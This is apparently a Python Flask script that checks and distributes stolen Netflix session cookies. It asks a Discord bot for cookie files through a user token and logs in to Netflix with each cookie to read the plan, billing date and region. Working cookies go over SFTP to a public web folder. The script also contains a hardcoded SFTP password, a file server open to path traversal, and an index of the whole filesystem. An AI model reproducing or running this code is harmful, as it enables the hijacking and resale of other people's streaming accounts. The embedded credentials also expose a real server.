|
|
import re |
|
|
import requests |
|
|
from bs4 import BeautifulSoup |
|
|
from deep_translator import GoogleTranslator |
|
|
import glob |
|
|
import os |
|
|
import shutil |
|
|
import string |
|
|
import random |
|
|
from flask import Flask, abort, send_file, render_template, request |
|
|
from flask_autoindex import AutoIndex |
|
|
from threading import Thread |
|
|
import time |
|
|
import json |
|
|
from urllib.parse import unquote |
|
|
import paramiko |
|
|
import fileinput |
|
|
|
|
|
|
|
|
class Unbuffered(object): |
|
|
def __init__(self, stream): |
|
|
self.stream = stream |
|
|
def write(self, data): |
|
|
self.stream.write(data) |
|
|
self.stream.flush() |
|
|
def writelines(self, datas): |
|
|
self.stream.writelines(datas) |
|
|
self.stream.flush() |
|
|
def __getattr__(self, attr): |
|
|
return getattr(self.stream, attr) |
|
|
import sys |
|
|
sys.stdout = Unbuffered(sys.stdout) |
|
|
|
|
|
|
|
|
def send_retrieve_cookie_msg(channelid): |
|
|
print("getting cookie") |
|
|
secret = os.environ['DISCORD_CODE'] |
|
|
|
|
|
print(secret) |
|
|
data = {"content": "c.gen netflix"} |
|
|
headers = {"authorization": secret} |
|
|
r = requests.post( |
|
|
"https://discord.com/api/v9/channels/1263391336594276356/messages", |
|
|
data=data, |
|
|
headers=headers) |
|
|
time.sleep(10) |
|
|
os.chdir("./cookies/") |
|
|
if r.status_code != 429: |
|
|
headers = {'authorization': secret} |
|
|
r = requests.get( |
|
|
f' https://discord.com/api/v9/channels/{channelid}/messages?limit=1', |
|
|
headers=headers) |
|
|
jsonn = json.loads(r.text) |
|
|
|
|
|
|
|
|
for value in jsonn: |
|
|
|
|
|
S = 6 |
|
|
ran = ''.join(random.choices(string.ascii_uppercase + string.digits, |
|
|
k=S)) |
|
|
|
|
|
try: |
|
|
attachmentUrl = value['attachments'][0]['url'] |
|
|
filename = str(ran) + ".txt" |
|
|
response = requests.get(attachmentUrl) |
|
|
open("old" + filename, "wb").write(response.content) |
|
|
s = 1 |
|
|
with open("old" + filename, 'r') as r, open(filename, 'w') as o: |
|
|
for line in r: |
|
|
|
|
|
if line.strip(): |
|
|
if (s == 1): |
|
|
o.write("# Netscape HTTP Cookie File\n") |
|
|
s = 2 |
|
|
o.write(line) |
|
|
os.remove("old" + filename) |
|
|
except Exception as e: |
|
|
|
|
|
print(e) |
|
|
pass |
|
|
else: |
|
|
print("cooldown") |
|
|
|
|
|
os.chdir("../") |
|
|
|
|
|
|
|
|
def parseCookieFile(cookiefile): |
|
|
x = "" |
|
|
"""Parse a cookies.txt file and return a dictionary of key value pairs |
|
|
compatible with requests.""" |
|
|
|
|
|
cookies = {} |
|
|
with open(cookiefile, 'r') as fp: |
|
|
for line in fp: |
|
|
if not re.match(r'^\#', line): |
|
|
lineFields = line.strip().split('\t') |
|
|
try: |
|
|
cookies[lineFields[5]] = lineFields[6] |
|
|
|
|
|
except: |
|
|
print("Invalid cookie") |
|
|
pass |
|
|
if x == "fail": |
|
|
return "fail" |
|
|
else: |
|
|
return cookies |
|
|
|
|
|
def fixCookie(cookiefile): |
|
|
for line in fileinput.FileInput(cookiefile,inplace=1): |
|
|
if re.match("======",line): |
|
|
break |
|
|
print(line.replace("\n","")) |
|
|
|
|
|
def getNetflixInfo(cookiefile): |
|
|
cookies = parseCookieFile(cookiefile) |
|
|
|
|
|
if cookies != "fail": |
|
|
|
|
|
r = requests.get("https://www.netflix.com/BillingActivity", |
|
|
cookies=cookies) |
|
|
print(r.url) |
|
|
if "login" in r.url: |
|
|
print("Login Page") |
|
|
os.remove(cookiefile) |
|
|
else: |
|
|
soup = BeautifulSoup(r.content, "html.parser") |
|
|
try: |
|
|
print(r.url) |
|
|
billingDate = soup.find("div", { |
|
|
"data-uia": "streaming-next-cycle" |
|
|
}) |
|
|
NetflixLocation = soup.find("div", { |
|
|
"data-uia": "loc" |
|
|
})['lang'] |
|
|
print(NetflixLocation) |
|
|
print(billingDate) |
|
|
try: |
|
|
billingDate = billingDate.get_text() |
|
|
except: |
|
|
billingDate = " " |
|
|
planName = soup.find("div", {"data-uia": "plan-name"}) |
|
|
print(planName) |
|
|
|
|
|
planName = planName.get_text() |
|
|
billingDate = GoogleTranslator(source='auto', |
|
|
target='en').translate(billingDate) |
|
|
try: |
|
|
lang = soup.find("html", {"lang": 'en'}).get_text() |
|
|
lang = "English" |
|
|
except: |
|
|
lang = "" |
|
|
pass |
|
|
planName = GoogleTranslator(source='auto', |
|
|
target='en').translate(planName) |
|
|
|
|
|
print(billingDate + " " + planName + " " + lang + " " +str(NetflixLocation)) |
|
|
try: |
|
|
x = requests.get("https://help.netflix.com/en/node/123279/" +str(NetflixLocation[NetflixLocation.find("-")+1:])) |
|
|
soup = BeautifulSoup(x.content, "html.parser") |
|
|
extraMembebr = soup.findAll('p') |
|
|
try: |
|
|
for i in extraMembebr: |
|
|
if("unavailable" in i.string): |
|
|
|
|
|
extraMembebr = "" |
|
|
|
|
|
except: |
|
|
extraMembebr = "EM Available" |
|
|
except: |
|
|
pass |
|
|
S = 3 |
|
|
ran = ''.join( |
|
|
random.choices(string.ascii_uppercase + string.digits, k=S)) |
|
|
cookieFileName = billingDate + " " + planName + " " + lang + " "+str(NetflixLocation)+" "+extraMembebr+ " (" + str(ran) + ").txt" |
|
|
newCookieFile = "../Membership/" + cookieFileName |
|
|
shutil.move( |
|
|
cookiefile, newCookieFile) |
|
|
fixCookie(newCookieFile) |
|
|
ftp,ssh_client = sftp_connect() |
|
|
files = ftp.put(newCookieFile,"./domains/hashir672.serv00.net/public_html/Membership/"+cookieFileName) |
|
|
|
|
|
print("uploaded ",files) |
|
|
|
|
|
|
|
|
ssh_client.close() |
|
|
os.remove(newCookieFile) |
|
|
|
|
|
except Exception as e: |
|
|
print(e) |
|
|
f = open("../Membership/error.txt", "a") |
|
|
f.write(str(e) + "\n\n") |
|
|
f.close() |
|
|
print("\n Moving in noMember") |
|
|
S = 10 |
|
|
ran = ''.join( |
|
|
random.choices(string.ascii_uppercase + string.digits, k=S)) |
|
|
shutil.move(cookiefile, '../NoMembership/NoMember' + str(ran) + ".txt") |
|
|
else: |
|
|
os.remove(cookiefile) |
|
|
print("cookie removed") |
|
|
|
|
|
def getNetflixInfoWithApi(cookiefile): |
|
|
url = "https://hashir672.serv00.net/Membership/"+str(cookiefile) |
|
|
response = requests.get(url) |
|
|
if response.status_code == 200: |
|
|
with open(cookiefile, "wb") as file: |
|
|
file.write(response.content) |
|
|
print("File downloaded successfully!") |
|
|
else: |
|
|
print("Failed to download the file.") |
|
|
return "Invalid Link" |
|
|
cookies = parseCookieFile(cookiefile) |
|
|
|
|
|
|
|
|
if cookies != "fail": |
|
|
|
|
|
r = requests.get("https://www.netflix.com/browse", |
|
|
cookies=cookies) |
|
|
print(r.url) |
|
|
if "login" in r.url: |
|
|
print("Login Page") |
|
|
thr = Thread(target=removeCookieFromServer,args=(cookiefile,)) |
|
|
thr.start() |
|
|
return "Not working" |
|
|
elif "browse" in r.url: |
|
|
soup = BeautifulSoup(r.content, "html.parser") |
|
|
return "working" |
|
|
else: |
|
|
thr = Thread(target=removeCookieFromServer,args=(cookiefile,)) |
|
|
thr.start() |
|
|
return "invalid cookie" |
|
|
|
|
|
|
|
|
def mainTask(): |
|
|
print("running cookie retriever") |
|
|
send_retrieve_cookie_msg(1239589658309034055) |
|
|
time.sleep(5) |
|
|
print("running netflix checker") |
|
|
os.chdir('./cookies/') |
|
|
for fileName in glob.glob("*.txt"): |
|
|
print(fileName) |
|
|
getNetflixInfo(fileName) |
|
|
os.chdir('../') |
|
|
|
|
|
def testTask(): |
|
|
os.chdir('./cookietest/') |
|
|
getNetflixInfo("./cookie.txt") |
|
|
os.chdir("../") |
|
|
|
|
|
def backupTask(location,filename): |
|
|
archived = shutil.make_archive('./'+filename, 'zip', location) |
|
|
header = { |
|
|
'authorization': os.environ['DISCORD_CODE'], |
|
|
} |
|
|
files = { |
|
|
"file" : ("./"+filename+".zip", open("./"+filename+".zip", 'rb')) |
|
|
} |
|
|
|
|
|
channel_id = "1193267345079156746" |
|
|
|
|
|
r = requests.post(f"https://discord.com/api/v9/channels/{channel_id}/messages", headers=header, files=files) |
|
|
|
|
|
def sftp_connect(): |
|
|
|
|
|
ssh_client = paramiko.SSHClient() |
|
|
|
|
|
|
|
|
host = "s1.serv00.com" |
|
|
username = "hashir672" |
|
|
password = "gVlwXbMsxPAA36%!OSIm" |
|
|
port = 22 |
|
|
|
|
|
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) |
|
|
ssh_client.connect(hostname=host,port=port,username=username,password=password) |
|
|
ftp = ssh_client.open_sftp() |
|
|
return ftp,ssh_client |
|
|
def removeCookieFromServer(cookiefile): |
|
|
os.remove(cookiefile) |
|
|
ftp,ssh_client = sftp_connect() |
|
|
ftp.remove("./domains/hashir672.serv00.net/public_html/Membership/"+cookiefile) |
|
|
ssh_client.close() |
|
|
|
|
|
app = Flask(__name__) |
|
|
|
|
|
|
|
|
@app.route('/', defaults={'req_path': ''}) |
|
|
@app.route('/<path:req_path>') |
|
|
def dir_listing(req_path): |
|
|
BASE_DIR = './Membership' |
|
|
|
|
|
abs_path = os.path.join(BASE_DIR, req_path) |
|
|
abs_path = unquote(abs_path) |
|
|
|
|
|
|
|
|
|
|
|
if os.path.isfile(abs_path): |
|
|
return send_file(abs_path) |
|
|
|
|
|
|
|
|
if not os.path.exists(abs_path): |
|
|
return str(abs_path) |
|
|
|
|
|
|
|
|
|
|
|
files = os.listdir(abs_path) |
|
|
return render_template('files.html', files=files) |
|
|
|
|
|
|
|
|
@app.route('/alive') |
|
|
def alive(): |
|
|
return "Keep Alive" |
|
|
|
|
|
|
|
|
@app.route('/main') |
|
|
def main(): |
|
|
|
|
|
thr = Thread(target=mainTask) |
|
|
thr.start() |
|
|
|
|
|
return 'Hello from Flask!' |
|
|
@app.route('/check') |
|
|
def check(): |
|
|
cookieFile = request.args.get('cookie') |
|
|
if(cookieFile==""): |
|
|
cookieFile="hello" |
|
|
print(cookieFile) |
|
|
checkCookie = getNetflixInfoWithApi(cookieFile) |
|
|
return str(checkCookie) |
|
|
@app.route('/test') |
|
|
def test(): |
|
|
thr = Thread(target=testTask) |
|
|
|
|
|
thr.start() |
|
|
|
|
|
return 'Hello from Flask! test' |
|
|
|
|
|
@app.route('/backup') |
|
|
def backup(): |
|
|
thr = Thread(target=backupTask,args=("./Membership","backup",)) |
|
|
|
|
|
print("backup Start") |
|
|
thr.start() |
|
|
|
|
|
return 'Backup Started of Memberhship' |
|
|
|
|
|
@app.route('/backupNoMembership') |
|
|
def backupNoMembership(): |
|
|
thr = Thread(target=backupTask,args=("./NoMembership","backupNoMembership",)) |
|
|
|
|
|
thr.start() |
|
|
|
|
|
return 'Backup Started of NoMemberhship' |
|
|
@app.route('/sftp_test') |
|
|
def sftp_test(): |
|
|
ssh_client = paramiko.SSHClient() |
|
|
|
|
|
|
|
|
host = "s1.serv00.com" |
|
|
username = "hashir672" |
|
|
password = "gVlwXbMsxPAA36%!OSIm" |
|
|
port = 22 |
|
|
|
|
|
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) |
|
|
ssh_client.connect(hostname=host,port=port,username=username,password=password) |
|
|
ftp = ssh_client.open_sftp() |
|
|
files = ftp.listdir() |
|
|
|
|
|
print("Listing all the files and Directory: ",files) |
|
|
|
|
|
|
|
|
ssh_client.close() |
|
|
return str(files) |
|
|
|
|
|
|
|
|
ppath = "/" |
|
|
|
|
|
AutoIndex(app, browse_root=ppath,) |
|
|
|
|
|
|